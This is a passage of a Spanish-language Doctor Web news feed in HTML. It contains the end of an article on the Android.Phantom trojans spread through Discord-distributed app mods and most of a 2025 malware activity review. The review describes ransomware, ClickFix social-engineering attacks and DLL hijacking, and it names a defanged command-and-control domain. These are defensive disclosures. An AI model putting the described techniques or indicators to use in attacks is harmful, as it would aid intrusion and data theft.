src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Los administradores de los servidores de Discord no dudan en ofrecer directamente los mods infectados. Por ejemplo, en la captura de pantalla anterior, el administrador, en nombre del servidor, propone descargar un mod del servicio de streaming musical Deezer en vez de Spotify, ya que este último dejó de funcionar.&lt;/p&gt;&lt;p&gt;A través del enlace se descarga un mod operativo. Su código está protegido por un empaquetador comercial; dentro se oculta el troyano&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Se trata de un cargador de código remoto que, por orden del servidor &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, descarga los ya conocidos&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;y el troyano espía &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. Este último envía información del dispositivo a los atacantes, incluido el número de teléfono, la geolocalización y la lista de aplicaciones instaladas.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Esta captura de pantalla del servidor muestra en qué idiomas hablan los usuarios objetivo de la infección. Para acceder a los chats en idiomas distintos del inglés, es necesario reaccionar con la bandera correspondiente. Los más numerosos son los usuarios que hablan español, francés, alemán, polaco e italiano (sin tomar en cuenta el inglés, que es el idioma principal del servidor). Además, los administradores del servidor no han previsto chats para muchos países de Asia.&lt;/p&gt;&lt;p&gt;Los troyanos pueden causar un daño considerable a los propietarios de los dispositivos infectados. Podrían darse, entre otros, los siguientes casos:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;Complicidad involuntaria.&lt;/strong&gt; El smartphone del usuario puede utilizarse como bot en un ataque DDoS, por lo tanto, su titular se convierte en un cómplice involuntario de un ciberdelito.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Actividad ilegal.&lt;/strong&gt; A través del dispositivo, los atacantes pueden realizar actividad ilegal en línea; por ejemplo, usar el smartphone en esquemas de fraude o enviar mensajes de spam.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Consumo elevado de batería y tráfico.&lt;/strong&gt; La actividad ajena descarga la batería y consume tráfico de Internet.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Filtración de datos personales.&lt;/strong&gt; &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; es un spyware y puede transmitir datos sobre el dispositivo y su titular.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Los troyanos de esta familia suponen una amenaza para los titulares de dispositivos móviles Android que no están protegidos con un software antivirus actualizado. Los usuarios rusos tienen dificultades para registrarse en aplicaciones extranjeras o pagar suscripciones. La situación empuja a buscar y utilizar formas alternativas, a menudo semiclandestinas, de obtener los servicios de estas empresas. Esto favorece a los creadores de malware, ya que los usuarios se ven obligados a asumir riesgos y a confiar en opciones dudosas. Un grupo especialmente vulnerable son los niños, que no piensan en las normas de higiene digital y solo quieren jugar, escuchar música o ver videoclips.&lt;/p&gt;&lt;p&gt;Recomendamos no descargar mods en sitios y canales dudosos. Por lo general, comprobar las fuentes de mods o aplicaciones requiere tiempo, experiencia y criterio. Por eso, la mejor forma de garantizar tranquilidad para uno mismo y sus seres queridos es usar Dr.Web Security Space en dispositivos móviles. Protegerá no solo sus smartphones, sino también otros dispositivos inteligentes: consolas de videojuegos, tabletas y smart TV.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Indicadores de compromiso&lt;/a&gt;&lt;br /&gt;
Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.3&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.4.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Más información sobre &lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15102&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus en el año 2025</title><link>https://news.dr-web.es/show/?i=15102&amp;lng=es&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 de enero de 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;En 2025, algunas de las amenazas más activas fueron los troyanos diseñados para visualizar publicidad. Los usuarios también se enfrentaron a varios scripts maliciosos y aplicaciones troyanas que ejecutan otro malware en los sistemas infectados. En el tráfico de correo electrónico se detectaron con mayor frecuencia los programas troyanos descargadores, backdoors, exploits, scripts maliciosos y documentos de phishing.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Entre las amenazas móviles, las más populares fueron los troyanos publicitarios y los programas falsos utilizados en distintos esquemas de fraude. Asimismo, se observó un aumento de la actividad de los troyanos bancarios. Al mismo tiempo, los analistas de virus de Doctor Web descubrieron decenas de nuevos programas maliciosos, no deseados y publicitarios en el catálogo de Google Play.&lt;br /&gt;
En comparación con 2024, se redujo el número de solicitudes de los usuarios para el descifrado de archivos. Al mismo tiempo, a lo largo del año nuestros analistas de Internet registraron un aumento del número de sitios web fraudulentos creados para robar las cuentas de los usuarios del messenger Telegram. Además, volvieron a proliferar sitios web no deseados de temática financiera.&lt;/p&gt;

&lt;p&gt;En 2025, el laboratorio antivirus de Doctor Web investigó varios ataques dirigidos, uno de los cuales se perpetró contra una empresa rusa de ingeniería mecánica. En el transcurso del ataque, los delincuentes utilizaron una serie de aplicaciones maliciosas con las que intentaban obtener datos confidenciales de los ordenadores infectados. Nuestros expertos detectaron que el grupo de hackers Scaly Wolf estuvo implicado en el ataque. Otro incidente afectó a una institución estatal rusa, que fue atacada por el grupo Cavalry Werewolf. Los analistas de malware de Doctor Web identificaron múltiples herramientas maliciosas utilizadas por los atacantes, y también analizaron las características del grupo y las acciones que le son propias dentro de las redes comprometidas.&lt;br /&gt;
A lo largo de 2025, la empresa Doctor Web también informó sobre otros incidentes de seguridad de la información. En enero, nuestro laboratorio antivirus detectó una campaña activa de minería de la criptomoneda Monero, organizada mediante el uso de múltiples tipos de malware. En abril, informamos asimismo sobre un troyano detectado en el firmware de varios modelos de smartphones Android, con cuya ayuda los ciberdelincuentes robaban criptomonedas. Además, ese mismo mes, nuestros expertos detectaron un troyano para Android que los atacantes habían integrado en una de las versiones de una popular aplicación de cartografía y que utilizaban para espiar a militares rusos.&lt;/p&gt;

&lt;p&gt;En julio, los expertos de Doctor Web informaron sobre una nueva familia de troyanos creada para robar criptomonedas y contraseñas. Los delincuentes los distribuían haciéndolos pasar por mods, trucos y parches para juegos. En agosto, los analistas de malware advirtieron sobre la propagación de un backdoor multifuncional para dispositivos móviles, dirigido a representantes del sector empresarial ruso. Los ciberdelincuentes lo controlaban de forma remota, robando con su ayuda datos confidenciales y vigilando a las víctimas.&lt;br /&gt;
En octubre, informamos sobre un backdoor para dispositivos Android que los ciberdelincuentes propagaban como parte de versiones modificadas del messenger Telegram X. Este malware roba los nombres de usuario y contraseñas de las cuentas de Telegram, así como otros datos confidenciales. Con su ayuda, los creadores de malware pueden administrar las cuentas comprometidas de las víctimas y controlar por completo el propio mensajero, realizando diversas acciones en nombre de los usuarios.&lt;br /&gt;
En diciembre, publicamos en nuestro sitio web un material sobre un troyano que “infla” la popularidad de los sitios web y, para ello, se hace pasar por una persona, de modo que sus acciones no sean bloqueadas por los sistemas antibot de las plataformas en línea. El malware busca de forma autónoma los sitios necesarios en los motores de búsqueda, los abre y realiza clics en las páginas web de acuerdo con los parámetros recibidos de los atacantes.&lt;br /&gt;
En 2025 también se observó un aumento de la popularidad de los ataques ClickFix, en los que los delincuentes utilizan técnicas de ingeniería social para que los propios usuarios ejecuten código malicioso en sus dispositivos.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendencias clave del año&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Se detectó una alta actividad de troyanos bancarios&lt;/li&gt;
        &lt;li&gt;Se realizaron nuevos ataques objetivo&lt;/li&gt;
        &lt;li&gt;Se observó un crecimiento de popularidad de ataques con el método ClickFix&lt;/li&gt;
        &lt;li&gt;Bajó el número de incidentes con troyanos cifradores&lt;/li&gt;
        &lt;li&gt;Aumentó el número de detecciones de troyanos bancarios para Android&lt;/li&gt;
        &lt;li&gt;Se detectaron nuevos casos de infección de firmware de dispositivos en Android&lt;/li&gt;
        &lt;li&gt;En el catálogo Google Play otra vez se propagó varios tipos de malware y software no deseado&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Los eventos más destacados del año 2025&lt;/h3&gt;

&lt;p&gt;En enero de 2025, los especialistas de Doctor Web &lt;a href="https://news.dr-web.es/show/?i=14976&amp;lng=es" target="_blank"&gt;detectaron&lt;/a&gt; una campaña de minería de la criptomoneda Monero que utilizaba el miner malicioso SilentCryptoMiner. Sus archivos estaban camuflados como distintos tipos de software, por ejemplo, programas para realizar videollamadas. Al infectar los ordenadores, eliminaban otros mineros que pudieran haberse instalado previamente en el sistema. En el marco de esta campaña, los atacantes emplearon esteganografía para distribuir algunos componentes maliciosos, una técnica que permite ocultar unos datos entre otros (por ejemplo, en imágenes). Tras descargar imágenes creadas de forma especial, los componentes correspondientes de SilentCryptoMiner se extraían de ellas y se ejecutaban.&lt;/p&gt;

&lt;p&gt;En abril, nuestros analistas de malware informaron sobre el troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, detectado en el firmware de varios modelos económicos de smartphones Android. Los atacantes lo integraron en una versión modificada del mensajero WhatsApp, que posteriormente preinstalaron en los dispositivos, comprometiendo la cadena de suministro de algunos fabricantes. &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercepta los mensajes enviados y recibidos en el messenger, busca en ellos direcciones de monederos de criptomonedas Tron y Ethereum y las sustituye por direcciones pertenecientes a los ciberdelincuentes. Al mismo tiempo, el troyano oculta la sustitución, de modo que las víctimas ven en los mensajes direcciones de monederos aparentemente correctas.&lt;/p&gt;

&lt;p&gt;Ese mismo mes, los expertos de Doctor Web descubrieron el troyano para Android &lt;a href="https://vms.dr-web.es/search/?q=Android.Spy.1292.origin&amp;lng=es"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, que los atacantes habían introducido en una de las versiones de la aplicación cartográfica Alpine Quest y que utilizaban para espiar a militares rusos. La aplicación maliciosa recopilaba información confidencial y permitía a los atacantes robar archivos de los dispositivos infectados.&lt;/p&gt;

&lt;p&gt;En julio, en el sitio web de la empresa Doctor Web se publicó un &lt;a href="https://news.dr-web.es/show/?i=15036&amp;lng=es" target="_blank"&gt;material&lt;/a&gt; sobre los programas troyanos &lt;a href="https://vms.dr-web.es/search/?q=Trojan.Scavenger&amp;lng=es"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt;, diseñados para robar criptomonedas y contraseñas. Los delincuentes los distribuían haciéndolos pasar por mods, trucos y parches para juegos. Este malware se ejecutaba utilizando software legítimo, entre otros métodos mediante la explotación de vulnerabilidades de la clase DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;En agosto, nuestros expertos &lt;a href="https://news.dr-web.es/show/?i=15047&amp;lng=es" target="_blank"&gt;informaron&lt;/a&gt; sobre la propagación del backdoor multifuncional &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, dirigido contra representantes de empresas rusas. La aplicación maliciosa se distribuía bajo la apariencia de un antivirus a través de mensajes privados en mensajeros. Al llegar a los dispositivos objetivo, &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; recopilaba datos confidenciales y permitía a los atacantes vigilar a las víctimas.&lt;br /&gt;
Además, en agosto el laboratorio antivirus de Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15046" target="_blank"&gt;publicó una investigación&lt;/a&gt; sobre un ataque dirigido del grupo Scaly Wolf contra una empresa rusa de ingeniería mecánica. Los ciberdelincuentes emplearon todo un conjunto de herramientas maliciosas, entre las cuales uno de los elementos principales fue el backdoor modular Updatar, que permitía a los atacantes recopilar información confidencial de los equipos infectados.&lt;/p&gt;

&lt;p&gt;En octubre, los expertos de Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15076&amp;lng=es" target="_blank"&gt;informaron&lt;/a&gt; sobre el backdoor &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, integrado por los atacantes en versiones modificadas del messenger Telegram X. &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; roba los nombres de usuario y contraseñas de las cuentas de Telegram, así como otros datos confidenciales. Este malware permite a los delincuentes obtener el control total de la cuenta del usuario y administrar el messenger al realizar acciones en nombre de la víctima. Por ejemplo, los atacantes pueden unirse a canales de Telegram de forma no autorizada y abandonarlos, así como ocultar nuevos dispositivos autorizados en la interfaz de la versión troyana de Telegram X.&lt;/p&gt;

&lt;p&gt;En noviembre, publicamos una &lt;a href="https://news.dr-web.es/show/?i=15078&amp;lng=es" target="_blank"&gt;investigación&lt;/a&gt; sobre un ataque dirigido del grupo de hackers Cavalry Werewolf contra una institución estatal rusa. Al analizar el incidente, los expertos de «Doctor Web» detectaron múltiples herramientas maliciosas utilizadas por los ciberdelincuentes, incluidas las herramientas de código abierto. Los analistas de malware analizaron las características del grupo y determinaron que sus miembros prefieren utilizar backdoors con funcionalidad de shell inverso y recurren con frecuencia a la API de Telegram para administrar los equipos infectados. Además, inician los ataques al enviar correos electrónicos de phishing supuestamente en nombre de organismos estatales y adjuntan malware, camuflado como varios documentos oficiales, a estos mensajes.&lt;/p&gt;

&lt;p&gt;En diciembre, la empresa Doctor Web publicó un &lt;a href="https://news.dr-web.es/show/?i=15090&amp;lng=es" target="_blank"&gt;análisis&lt;/a&gt; del malware &lt;a href="https://vms.dr-web.es/search/?q=Trojan.ChimeraWire&amp;lng=es"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, que infla la popularidad de sitios web haciéndose pasar por una persona. El troyano busca los sitios necesarios en los motores de búsqueda Google y Bing, los abre y realiza clics en las páginas web cargadas de acuerdo con las tareas recibidas de los delincuentes. &lt;a href="https://vms.dr-web.es/search/?q=Trojan.ChimeraWire&amp;lng=es"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; se instala en los ordenadores mediante una serie de programas maliciosos que explotan vulnerabilidades de la clase DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;A lo largo de 2025 se observó un aumento de la popularidad de los ataques que utilizan el método ClickFix. Este consiste en que los atacantes recurren a la ingeniería social para inducir a las posibles víctimas, mediante engaños, a ejecutar por sí mismas código malicioso. Cuando los usuarios acceden a un sitio web malicioso o comprometido, este les informa de un supuesto error o de la necesidad de actualizar el navegador y les propone “solucionar” el problema. Para ello, según la variante del ataque, se pide a los usuarios que copien las líneas indicadas en la página o que simplemente pulsen el botón correspondiente (por ejemplo, «Actualizar» o «Corregir»). En este último caso, el contenido necesario se copia automáticamente en el portapapeles. A continuación, se les solicita que abran la línea de comandos o el terminal PowerShell, peguen allí el contenido del portapapeles y pulsen la tecla Enter. Como resultado, las víctimas ejecutan por sí mismas el código malicioso, que inicia la cadena de infección del ordenador. Para más información sobre los ataques ClickFix, puede consultar el &lt;a href="https://news.dr-web.es/show/?i=15074&amp;lng=es" target="_blank"&gt;material&lt;/a&gt; correspondiente en nuestro sitio web.&lt;/p&gt;

&lt;h3&gt;Los eventos de virus&lt;/h3&gt;

&lt;p&gt;Según las estadísticas de detección del antivirus Dr.Web, en 2025 el número total de amenazas detectadas aumentó un 5,45 % en comparación con 2024. Al mismo tiempo, el número de amenazas únicas se redujo un 15,89 %. Con mayor frecuencia, los usuarios afrontaron varios scripts maliciosos y troyanos publicitarios. Además, se propagaron los troyanos utilizados para ejecutar otro malware. Asimismo, los usuarios volvieron a verse amenazados por aplicaciones troyanas creadas en el lenguaje de scripting AutoIt, que se distribuyen como parte de otro malware con el fin de dificultar su detección.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un script malicioso que en un ciclo infinito busca las ventanas con el texto &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; y &lt;span class="string"&gt;розробника&lt;/span&gt; y les envía un evento de pulsación del botón Escape, al cerrarlas de forma forzosa.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de un componente malicioso de la extensión del navegador WinSafe. Este componente es un script de JavaScript que visualiza publicidad importuna en navegadores.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de scripts XML maliciosos que inician el troyano &lt;a href="https://vms.dr-web.es/search/?q=Trojan.AutoIt.289&amp;lng=es"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; y sus componentes.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=JS.Siggen5.44590&amp;lng=es"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Un código malicioso añadido a la biblioteca JavaScript pública, es5-ext-main. Visualiza un mensaje determinado si el paquete está instalado en el servidor con el huso horario de ciudades rusas.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un proceso host del framework Electron modificado por los malintencionados, camuflado como componentes de la aplicación Steam (Steam Client WebHelper) que carga un backdoor en JavaScript.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un script malicioso usado por varios tipos de malware para conectarse a los servidores de control.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un troyano creado en lenguaje de programación Go y destinado para cargar en el sistema objetivo varios miners y adware. El malware es un archivo DLL y está en &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Para su inicio, usa la vulnerabilidad de la clase DLL Search Order Hijacking en el cliente torrent uTorrent.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;En el tráfico de correo en el año 2025 con mayor frecuencia se detectaban los programas troyanos que descargaban e instalaban otro malware. Los malintencionados también propagaron a través de los mensajes electrónicos varios backdoors, exploits, documentos phishing y scripts maliciosos.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Una familia de troyanos descargadores que usan las vulnerabilidades de los documentos Microsoft Office. Sirven para descargar otro malware al equipo atacado.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Exploits para usar vulnerabilidades en el software Microsoft Office, que permiten ejecutar un código aleatorio.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un script malicioso en lenguaje JavaScript que genera una página web de phishing.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un malware espía destinado a robar información confidencial. Por ejemplo, recopila y transmite a los atacantes nombres de usuario y contraseñas de numerosas aplicaciones, como navegadores, mensajeros, clientes de correo, bases de datos, etc. También roba datos del portapapeles, incorpora funcionalidad de keylogger y puede realizar capturas de pantalla (screenshots).&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un virus de archivos que infecta archivos ejecutables de Windows. Su objetivo principal es robar contraseñas de varios programas.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección heurística para los archivos ZIP que contienen los scripts de JavaScript con nombres sospechosos. &lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de malware protegido por un comprimidor.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de la versión comprimida del programa troyano &lt;a href="https://vms.dr-web.es/search/?q=Trojan.AutoIt.289&amp;lng=es"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;, creado en lenguaje de script AutoIt. Se propaga en un grupo de varios tipos de malware: un miner, un backdoor y un módulo para la propagación automática. &lt;a href="https://vms.dr-web.es/search/?q=Trojan.AutoIt.289&amp;lng=es"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; realiza varias acciones maliciosas que dificultan la detección de la carga útil básica.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Cifradores&lt;/h3&gt;

&lt;p&gt;En comparación con 2024, en 2025 el Servicio de soporte técnico de Doctor Web recibió un 35,98 % menos de solicitudes de usuarios que habían resultado afectados por troyanos cifradores. La dinámica del registro de solicitudes de descifrado de archivos se muestra en el gráfico siguiente.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Los cifradores más populares en el año 2025:&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;(23,22% de solicitudes de usuarios)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Un cifrador también conocido como Mimic. Para buscar los archivos objetivo para el cifrado el troyano usa la biblioteca &lt;span class="string"&gt;everything.dll&lt;/span&gt; del programa legal Everything destinada a la búsqueda instantánea de archivos en ordenadores con Windows.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;(3,33% de solicitudes de usuarios)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Cifrador basado en el código fuente del troyano encoder Conti. Cifra los archivos con el algoritmo ChaCha20. Tras la desmantelación de varios servidores de mando y control de los delincuentes y la revelación de claves privadas RSA de cifrado, para algunas modificaciones de este malware está disponible el descifrado de los archivos afectados.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;(2,50% de solicitudes de usuarios)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Cifrador conocido como Masor (una variante de este troyano es &lt;b&gt;Trojan.Encoder.30572&lt;/b&gt;). Tiene un tamaño reducido, de unos 30–40 KB. Esto se debe en parte a que el troyano no incluye bibliotecas criptográficas de terceros y utiliza solo funciones de CryptoAPI para el cifrado y la generación de claves. Para cifrar los archivos emplea el algoritmo AES-256, y las propias claves se cifran con RSA-1024.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;(2,31% de solicitudes de usuarios)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Cifrador cuyos artefactos indican la implicación del grupo de hackers C77L en su creación.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;(2,13% de solicitudes de usuarios)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Un troyano extorsionista que tiene varias versiones. Sus modificaciones actuales cifran los archivos con un algoritmo AES-256+RSA.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Fraudulencias en la red&lt;/h3&gt;

&lt;p&gt;En 2025, los analistas de Internet de la empresa Doctor Web observaron un aumento del número de sitios de phishing creados para robar cuentas del messenger Telegram. Los delincuentes utilizaron varios esquemas, como páginas falsas de autenticación y autorización, así como mensajes fraudulentos supuestamente enviados por el servicio de soporte de Telegram, en los que se advertía de presuntas infracciones en el uso del messenger y de la necesidad de realizar una «verificación» de la cuenta, entre otros.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web phishing que informa de la necesidad de hacer una verificación de la cuenta de Telegram a causa de alguna infracción de los requisitos del uso del servicio&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Los sitios web de este tipo también se crearon para usuarios de otros servicios, por ejemplo, plataformas de videojuegos, tiendas en línea, etc. Las falsificaciones podían parecer recursos web legítimos y ofrecían iniciar sesión en la cuenta. Si los usuarios caían en la trampa, los delincuentes averiguaban la información confidencial.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
